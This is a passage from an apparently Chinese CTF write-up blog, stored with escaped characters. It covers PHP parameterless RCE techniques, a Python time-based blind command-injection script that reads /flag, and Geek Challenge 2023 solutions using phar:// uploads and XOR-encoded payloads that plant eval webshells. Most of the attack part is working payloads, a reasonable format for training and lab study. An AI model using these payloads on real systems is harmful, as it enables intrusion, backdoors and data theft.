session_start()<\/code>\u6765\u4fdd\u8bc1session_id()\u7684\u4f7f\u7528\uff0csession_id<\/code>\u53ef\u4ee5\u7528\u6765\u83b7\u53d6\u5f53\u524d\u4f1a\u8bddID\uff0c\u4e5f\u5c31\u662f\u8bf4\u5b83\u53ef\u4ee5\u6293\u53d6PHPSESSID\u540e\u9762\u7684\u4e1c\u897f\uff0c\u4f46\u662fphpsession\u4e0d\u5141\u8bb8()\u51fa\u73b0<\/p>\n\n\n\n\u6cd5\u4e00\uff1ahex2bin\uff08\uff09<\/h5>\n\n\n\n
\u6211\u4eec\u81ea\u5df1\u624b\u52a8\u5bf9\u547d\u4ee4\u8fdb\u884c\u5341\u516d\u8fdb\u5236\u7f16\u7801\uff0c\u540e\u9762\u5728\u7528\u51fd\u6570hex2bin()\u89e3\u7801\u8f6c\u56de\u53bb\uff0c\u4f7f\u5f97\u540e\u7aef\u5b9e\u9645\u63a5\u6536\u5230\u7684\u662f\u6076\u610f\u4ee3\u7801\u3002\u6211\u4eec\u628a\u60f3\u8981\u6267\u884c\u7684\u547d\u4ee4\u8fdb\u884c\u5341\u516d\u8fdb\u5236\u7f16\u7801\u540e\uff0c\u66ff\u6362\u6389\u2018Cookie:PHPSESSID=\u2019\u540e\u9762\u7684\u503c<\/p>\n\n\n\n
<?php
$encoded = bin2hex(\"phpinfo();\");
echo $encoded;
?><\/pre>\n\n\n\n\u5f97\u5230phpinfo();\u7684\u5341\u516d\u8fdb\u5236\u7f16\u7801\uff0c\u5373706870696e666f28293b<\/p>\n\n\n\n
?\u53c2\u6570=eval(hex2bin(session_id(session_start())));\u540c\u65f6\u66f4\u6539cookie\u540e\u7684\u503c\u4e3a\u60f3\u6267\u884c\u7684\u547d\u4ee4\u7684\u5341\u516d\u8fdb\u5236\u7f16\u7801<\/pre>\n\n\n\n\u6cd5\u4e8c\uff1a[\u8bfb\u6587\u4ef6]<\/h5>\n\n\n\n
\u5982\u679c\u5df2\u77e5\u6587\u4ef6\u540d\uff0c\u628a\u6587\u4ef6\u540d\u5199\u5728PHPSESSID\u540e\u9762\uff0c\u6784\u9020payload\u4e3a\uff1a<\/p>\n\n\n\n
readfile(session_id(session_start()));
Cookie:PHPSESSID=canshu.php<\/pre>\n\n\n\ngetallheaders()<\/h5>\n\n\n\n
getallheaders()\u8fd4\u56de\u5f53\u524d\u8bf7\u6c42\u7684\u6240\u6709\u8bf7\u6c42\u5934\u4fe1\u606f\uff0c\u5c40\u9650\u4e8eApache\uff08apache_request_headers()\u548cgetallheaders()\u529f\u80fd\u76f8\u4f3c\uff0c\u53ef\u4e92\u76f8\u66ff\u4ee3\uff0c\u4e0d\u8fc7\u4e5f\u662f\u5c40\u9650\u4e8eApache\uff09<\/p>\n\n\n\n
\u5f53\u786e\u5b9a\u80fd\u591f\u8fd4\u56de\u65f6\uff0c\u6211\u4eec\u5c31\u80fd\u5728\u6570\u636e\u5305\u6700\u540e\u4e00\u884c\u52a0\u4e0a\u4e00\u4e2a\u8bf7\u6c42\u5934\uff0c\u5199\u5165\u6076\u610f\u4ee3\u7801\uff0c\u518d\u7528end()\u51fd\u6570\u6307\u5411\u6700\u540e\u4e00\u4e2a\u8bf7\u6c42\u5934\uff0c\u4f7f\u5176\u6267\u884c\uff0cpayload\uff1a<\/p>\n\n\n\n
var_dump(end(getallheaders()));<\/pre>\n\n\n\n\u9700\u8981\u81ea\u5df1\u6dfb\u52a0\u7684\u8bf7\u6c42\u5934\uff0c end()\u6307\u5411\u6700\u540e\u4e00\u884c\u7684\u503c\uff0c\u8fbe\u5230phpinfo\u7684\u76ee\u7684\uff0c\u7136\u540e\u53ef\u4ee5\u8fdb\u4e00\u6b65\u53bbrce\u3002<\/pre>\n\n\n\nchdir()&array_rand()\u8d4c\u72d7\u8bfb\u6587\u4ef6<\/h5>\n\n\n\n
\u5229\u7528getcwd()\u83b7\u53d6\u5f53\u524d\u76ee\u5f55\uff1a
\u200b
var_dump(getcwd());
\u7ed3\u5408dirname()\u5217\u51fa\u5f53\u524d\u5de5\u4f5c\u76ee\u5f55\u7684\u7236\u76ee\u5f55\u4e2d\u7684\u6240\u6709\u6587\u4ef6\u548c\u76ee\u5f55:
\u200b
var_dump(scandir(dirname(getcwd())));
\u8bfb\u4e0a\u4e00\u7ea7\u6587\u4ef6\u540d\uff1a
show_source(array_rand(array_flip(scandir(dirname(chdir(dirname(getcwd())))))));
show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(getcwd())))))))))));
show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(chr(ord(hebrevc(crypt(phpversion())))))))))))))));
\u200b
\u8bfb\u6839\u76ee\u5f55:
\u200b
ord() \u51fd\u6570\u548c chr() \u51fd\u6570\uff1a\u53ea\u80fd\u5bf9\u7b2c\u4e00\u4e2a\u5b57\u7b26\u8fdb\u884c\u8f6c\u7801\uff0cord() \u7f16\u7801\uff0cchr)\u89e3\u7801\uff0c\u6709\u6982\u7387\u4f1a\u89e3\u7801\u51fa\u659c\u6760\u8bfb\u53d6\u6839\u76ee\u5f55
\u200b
print_r(scandir(chr(ord(strrev(crypt(serialize(array())))))));
\u200b
\u8981\u7528chdir()\u56fa\u5b9a\uff0cpayload\uff1a
\u200b
show_source(array_rand(array_flip(scandir(dirname(chdir(chr(ord(strrev(crypt(serialize(array() )))))))))));<\/pre>\n\n\n\nimport requests
import string
import time
url = 'http:\/\/127.0.0.1\/1.php?star='
dic = string.printable[:-6]
flag = ''
for i in range(1, 50):
judge = 0
for j in dic:
now = f'{url}a=$(cat \/flag | head -1 | cut -b {i});if [ $a = {j}
];then sleep 2;fi'
start = time.time()
r = requests.get(now)
end = time.time()
if int(end) - int(start) > 1:
judge = 1
flag += j
print(flag)
break
if judge == 0:
break
print(flag)<\/pre>\n\n\n\n\u96e8<\/h2>\n\n\n\n
\u4e4b\u540e\u8865\u5145<\/p>\n\n\n\n
\u6781\u5ba2\u5927\u6311\u62182023-web-famale_imp_l0ve<\/h2>\n\n\n\n
\u53ea\u80fd\u4e0a\u4f20
.zip<\/code><\/p>\n\n\n\n\u67e5\u770b\u6e90\u7801\uff0c\u53d1\u73b0\u4e00\u4e2a\u5305\u542b\u529f\u80fd\u7684\u6587\u4ef6
\/include.php<\/code><\/p>\n\n\n\n<?php
\/\/o2takuXX\u5e08\u5085\u8bf4\u6709\u95ee\u9898\uff0c\u5fd8\u770b\u4e86\u3002
header('Content-Type: text\/html; charset=utf-8');
highlight_file(__FILE__);
$file = $_GET['file'];
if(isset($file) && strtolower(substr($file, -4)) == \".jpg\"){
include($file);
}
?><\/pre>\n\n\n\n\u901a\u8fc7php\u4f2a\u534f\u8bae\u8bbf\u95ee\u4e0a\u4f20\u7684zip\u6587\u4ef6\uff0c\u4f7f\u7528
phar:\/\/<\/code>\u534f\u8bae\u3002phar:\/\/<\/code>\u534f\u8bae\u53ef\u4ee5\u8bfb\u53d6\u4efb\u610f\u540e\u7f00\u538b\u7f29\u5305\u4e2d\u7684\u5185\u5bb9\uff0c\u5982.zip<\/code>\u3002<\/p>\n\n\n\n\u5148\u4e0a\u4f20\u4e00\u4e2a1.zip\u6587\u4ef6\uff0c\u5176\u4e2d\u5305\u542b\u4e00\u53e5\u8bdd\u9a6c\uff0c\u9a6c\u6587\u4ef6\u540e\u7f00\u662f.jpg\u3002
GET:
\/include.php?file=phar:\/\/\/var\/www\/upload\/1.zip\/1.jpg
\u200b
POST:
cmd=system('tac \/flag');<\/pre>\n\n\n\n\u6781\u5ba2\u5927\u6311\u62182023-web-EzRce<\/h2>\n\n\n\n
<?php
include('waf.php');
session_start();
show_source(__FILE__);
error_reporting(0);
$data=$_GET['data'];
if(waf($data)){
eval($data);
}else{
echo \"no!\";
}
?><\/pre>\n\n\n\n\u8c8c\u4f3c\u8fc7\u6ee4\u5355\u4e2a\u5b57\u7b26\u548c\u6570\u5b57\uff0c\u90a3\u5c31\u65e0\u5b57\u6bcdRCE\u3002\uff08\u591a\u8bd5\u8bd5\u5c31\u77e5\u9053\u4e86\uff09<\/p>\n\n\n\n
\u4f7f\u7528\u5f02\u6216\u5c31\u51fa\u6765\u4e86<\/p>\n\n\n\n
?data=(\"%0f%08%0f%09%0e%06%0f\"^\"%7f%60%7f%60%60%60%60\")()%3B phpinfo()
\u8bfb\u53d6waf\u6587\u4ef6highlight_file('waf.php')
(\"%08%09%07%08%0c%09%07%08%0b%01%06%09%0c%05\"^\"%60%60%60%60%60%60%60%60%7f%5e%60%60%60%60\")(\"%08%01%06%01%0f%08%0f\"^\"%7f%60%60%2f%7f%60%7f\")%3B<\/pre>\n\n\n\nfunction waf($data){
if(preg_match('\/[b-df-km-uw-z0-9\\+\\~\\{\\}]+\/i',$data)){
return False;
}else{
return True;
}
}<\/pre>\n\n\n\n\u5229\u7528p\u795e\u7684\u4e00\u4e9b\u4e0d\u5305\u542b\u6570\u5b57\u548c\u5b57\u6bcd\u7684webshell | \u79bb\u522b\u6b4c (leavesongs.com)<\/a><\/p>\n\n\n\n
<?php
$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); \/\/ $__='_POST';
$___=$$__;
eval($___[_]); \/\/ eval($_POST[_]);<\/pre>\n\n\n\npayload:
?data=$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']')%3B$___=$$__%3Beval($___[_])%3B
POST:_=phpinfo()%3B
_=_=file_put_contents('1.php','<?=eval($_POST[1]);?>')%3B \u5199\u4e0a\u53bb\u5c0f\ud83d\udc0e<\/pre>\n\n\n\n\u7136\u540e\u53d1\u73b0\u6253\u5f00\/flag\u6587\u4ef6\u662f\u7a7a\u7684\uff0c\u5e94\u8be5\u662f\u6ca1\u6709\u6743\u9650\uff0c\u5728\u7f51\u4e0a\u53d1\u73b0\u662fsuid\u63d0\u6743<\/p>\n\n\n\n